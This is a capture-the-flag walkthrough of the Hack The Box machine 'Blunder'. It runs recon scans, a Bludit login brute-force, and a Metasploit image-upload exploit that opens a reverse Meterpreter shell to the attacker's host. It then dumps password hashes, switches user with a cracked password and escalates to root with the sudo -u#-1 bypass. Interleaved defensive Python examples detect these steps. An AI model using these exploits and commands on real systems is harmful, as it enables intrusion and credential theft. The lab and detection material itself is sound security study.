# Blunder

Let's start with nmap:

```
root@liberty:/home/kali# nmap blunder.htb
Starting Nmap 7.91 ( https://nmap.org ) 
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.019s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
21/tcp closed ftp
80/tcp open   http

Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
root@liberty:/home/kali# nmap -sV blunder.htb
Starting Nmap 7.91 ( https://nmap.org ) 
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.015s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@liberty:/home/kali# 
```

Next is Nikto. Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers:

```
root@liberty:/home/kali# nikto -h blunder.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.4.41
+ Target Hostname:    blunder.htb
+ Target Port:        80
+ Start Time:         2020-10-13 13:32:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
```

Next we will enumerate some directories with Dirb. **DIRB** is a web content scanner: it looks for existing (and/or hidden) web objects by launching a dictionary-based attack against a web server and analyzing the responses.

This allows us to quickly locate interesting directories such as admin portals.

We also take a look at the site itself, which has a lot of words. I think this is a perfect time for CeWL.

```
root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@liberty:~# ls
Desktop  Documents  Downloads  htb  Music  Pictures  Public  Templates  Videos  wordlist
root@liberty:~# cat wordlist 
the
Load
Plugins
and
for
Include
Site
Page
has
About
King
with
USB
Begin
more
End
service
from
Stadia
Dynamic
...
```

After fuzzing with dirb, I came across this information in /to.txt:

```
-Inform fergus that the new blog needs images - PENDING
```

I'm thinking that fergus might be a username. Also, after doing a quick Google search, I came across this exploit:

{% embed url="<https://www.exploit-db.com/exploits/48746>" %}

There are a couple of Ruby requirements for this exploit, so let's install them now.

```
root@liberty:~/htb# gem install httpclient
Fetching httpclient-2.8.3.gem
Successfully installed httpclient-2.8.3
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Done installing documentation for httpclient after 0 seconds
1 gem installed
root@liberty:~/htb# gem install docopt
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
1 gem installed
root@liberty:~/htb# 

```

Let's give this exploit a try:

```
root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist 
[*] Trying password: the
[*] Trying password: Load
[*] Trying password: Plugins
[*] Trying password: and
[*] Trying password: for
[*] Trying password: Include
[*] Trying password: Site
[*] Trying password: Page
[*] Trying password: has
[*] Trying password: About
[*] Trying password: King
[*] Trying password: with
[*] Trying password: USB
[*] Trying password: Begin
...

[+] Password found: RolandDeschain
```
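As an added detection-side example (not part of the original writeup, and not the exploit's code): the attempts above land in Apache's access log as a burst of POSTs to the login form from one TCP peer. This Python keys on `%h`, the peer address, so the count is unaffected by any client-supplied header; the log lines and the `/admin/login` path are constructed assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache "combined" log excerpt (made up for this example): one client
# cycling through guesses against the Bludit login form, plus ordinary traffic.
SAMPLE_LOG = """\
10.10.14.45 - - [13/Oct/2020:13:40:01 -0400] "POST /admin/login HTTP/1.1" 200 1423 "-" "-"
10.10.14.45 - - [13/Oct/2020:13:40:01 -0400] "POST /admin/login HTTP/1.1" 200 1423 "-" "-"
10.10.14.45 - - [13/Oct/2020:13:40:02 -0400] "POST /admin/login HTTP/1.1" 200 1423 "-" "-"
10.10.14.45 - - [13/Oct/2020:13:40:02 -0400] "POST /admin/login HTTP/1.1" 200 1423 "-" "-"
10.10.14.45 - - [13/Oct/2020:13:40:03 -0400] "POST /admin/login HTTP/1.1" 200 1423 "-" "-"
10.10.14.45 - - [13/Oct/2020:13:40:03 -0400] "POST /admin/login HTTP/1.1" 302 0 "-" "-"
10.10.14.10 - - [13/Oct/2020:13:40:05 -0400] "GET /about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.10 - - [13/Oct/2020:13:41:00 -0400] "POST /admin/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# %h %l %u [%t] "%r" %>s ... : we only need peer IP, timestamp, method, path and status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Parse one combined-log line; return (ip, datetime, method, path, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def find_login_bursts(log_text, threshold=5, window=timedelta(seconds=60),
                      login_path="/admin/login"):
    """Return {peer_ip: total_login_posts} for peers that POST to the login path at
    least `threshold` times inside any sliding `window` (keyed on the TCP peer, %h)."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == login_path:
            attempts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1          # slide the window forward
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged
```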

With these creds we now have access to the admin portal. After googling "bludit admin portal exploit" I came across this article:

{% embed url="<https://www.exploit-db.com/exploits/48568>" %}

Looks like there is also a Metasploit module:

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/http/bludit_upload_images_exec>" %}

```
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.14.45:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ZTJkGHVYBh.png...
[*] Uploading .htaccess...
[*] Executing ZTJkGHVYBh.png...
[*] Sending stage (38288 bytes) to 10.129.4.41
[*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400
[+] Deleted .htaccess

meterpreter > shell
Process 4834 created.
Channel 1 created.
whoami
www-data

```
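Added example (not from the writeup or the Metasploit module): a forensic check for what the module's upload step leaves on disk. It walks an upload directory such as `bl-content/tmp` and flags a stray `.htaccess` and image-named files whose bytes are not an image or carry a PHP tag; the fixture directory and its file contents are constructed for this example.

```python
import tempfile
from pathlib import Path

# Magic bytes a file with these extensions must start with to be a real image.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

def scan_upload_dir(upload_dir):
    """Walk an upload directory (e.g. bl-content/tmp) and return (path, finding) pairs for
    the artefacts the upload-images technique leaves behind: a stray .htaccess, and files
    with an image extension whose bytes are not an image or contain a PHP open tag."""
    findings = []
    for path in Path(upload_dir).rglob("*"):   # pathlib's glob also matches dotfiles
        if not path.is_file():
            continue
        if path.name == ".htaccess":
            findings.append((str(path), "htaccess-in-upload-dir"))
            continue
        ext = path.suffix.lower()
        if ext in IMAGE_MAGIC:
            head = path.read_bytes()[:4096]
            if not head.startswith(IMAGE_MAGIC[ext]):
                findings.append((str(path), "image-extension-wrong-magic"))
            if b"<?php" in head or b"<?=" in head:
                findings.append((str(path), "php-tag-in-image"))
    return sorted(findings)

def build_sample_dir():
    """Constructed fixture (not real box data) mimicking the upload directory if the
    module's cleanup had not run: a genuine PNG, a 'PNG' that is PHP, and a .htaccess."""
    d = Path(tempfile.mkdtemp())
    (d / "real.png").write_bytes(IMAGE_MAGIC[".png"] + b"\x00" * 32)
    (d / "ZTJkGHVYBh.png").write_bytes(b"<?php /* constructed stand-in for a web shell */ ?>")
    (d / ".htaccess").write_text("# constructed leftover\nRewriteEngine off\n")
    return str(d)

if __name__ == "__main__":
    for path, finding in scan_upload_dir(build_sample_dir()):
        print(f"{finding:30} {path}")
```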

Let's stabilize this shell:

```
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$
```

Let's begin our enumeration, both manually and automated. To automate, we will use LinEnum (linenum.sh):

{% embed url="<https://github.com/rebootuser/LinEnum>" %}

```
root@liberty:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.4.41 - - [TBD] "GET /linenum.sh HTTP/1.1" 200
```

Grepping the contents of the application for phrases such as auth, password, and key, we come across this result in users.php:

```
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "",
        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$
```

Let's use hash-identifier to see what we are dealing with here:

```
root@liberty:~/htb# hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: bfcc887f62e36ea019e3295aafb8a3885966e265

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

```
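An added example, not from the writeup or from Bludit's code base, on why the identification above matters: Bludit stores `sha1(password . salt)`, a fast hash with no work factor, which is why hash-identifier sees plain SHA-1. It is shown next to a PBKDF2-based record format (my own assumption for a hardened replacement, not anything Bludit ships) with a constant-time verify.

```python
import hashlib
import hmac
import os

def bludit_hash(password, salt):
    """Bludit's stored form: sha1(password . salt), i.e. one cheap SHA-1 per guess.
    The 40-hex-character values and short salts in users.php above are exactly this."""
    return hashlib.sha1((password + salt).encode()).hexdigest()

def legacy_verify(password, salt, stored_hash):
    """Check a candidate against a Bludit-style record in constant time."""
    return hmac.compare_digest(bludit_hash(password, salt), stored_hash)

# Hardened form (an assumption for this example, not Bludit code): PBKDF2-HMAC-SHA256
# with 16 random salt bytes and a high iteration count, serialised as one
# self-describing string so the parameters travel with the hash.
PBKDF2_ITERATIONS = 600_000

def make_password_record(password):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password_record(password, record):
    """Constant-time check against a record produced by make_password_record."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False            # malformed record: never accept
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)

if __name__ == "__main__":
    # Constructed values; the stored hash is derived here, not taken from the box.
    print(legacy_verify("RolandDeschain", "jqxpjfnv", bludit_hash("RolandDeschain", "jqxpjfnv")))
    print(verify_password_record("Password120", make_password_record("Password120")))
```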

This hash can be cracked online. Let's use the password to access the system as this user.

```
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ su hugo
su hugo
Password: Password120
```

Let's locate the user flag now that we have access outside of our PHP shell.

```
hugo@blunder:~$ ls
ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
FLAG HERE
```

We can check our sudo permissions using `sudo -l`:

```
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$
```

After some googling we come across this exploit:

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}

They don't come any easier than this. Looks like our privilege escalation requires this one command: `sudo -u#-1 /bin/bash`

```
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
FLAG HERE
root@blunder:/home/hugo# 
```
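An added check, written for this post and not taken from the exploit: a rule like `(ALL, !root)` is only as strong as the sudo binary enforcing it, since the bypass above (CVE-2019-14287) was fixed in sudo 1.8.28. The sudoers text and `sudo -V` output below are constructed samples mirroring the `sudo -l` output above.

```python
import re

FIXED_IN = (1, 8, 28)   # CVE-2019-14287 (sudo -u#-1) was fixed in sudo 1.8.28

def sudo_version_tuple(version_output):
    """Parse the first line of `sudo -V` (e.g. 'Sudo version 1.8.27') into a tuple."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError("unrecognised sudo -V output")
    return tuple(int(x) for x in m.groups())

# user  host=(runas) commands   (sudoers user-spec, enough for this check)
RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

def risky_runas_rules(sudoers_text):
    """Return (user, runas, commands) for rules whose runas list grants ALL but then
    excludes an account with '!', the exact shape of hugo's rule above. The exclusion
    only holds on a patched sudo; on 1.8.27 and older it collapses to root."""
    out = []
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0].strip()       # drop comments and blank lines
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(",")]
        if "ALL" in runas and any(p.startswith("!") for p in runas):
            out.append((m.group("user"), m.group("runas"), m.group("cmds").strip()))
    return out

def assess(version_output, sudoers_text):
    """Pair each risky rule with whether the installed sudo is old enough to be bypassed."""
    vulnerable = sudo_version_tuple(version_output) < FIXED_IN
    return [(u, r, c, vulnerable) for u, r, c in risky_runas_rules(sudoers_text)]

# Constructed inputs (not copied from the box) echoing the `sudo -l` result above.
SAMPLE_SUDO_V = "Sudo version 1.8.27\nSudoers policy plugin version 1.8.27\n"
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed example)
Defaults env_reset, mail_badpass
root ALL=(ALL:ALL) ALL
hugo ALL=(ALL, !root) /bin/bash
%sudo ALL=(ALL:ALL) ALL
"""

if __name__ == "__main__":
    for user, runas, cmds, vuln in assess(SAMPLE_SUDO_V, SAMPLE_SUDOERS):
        print(f"{user}: ({runas}) {cmds} -> {'BYPASSABLE' if vuln else 'enforced'}")
```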
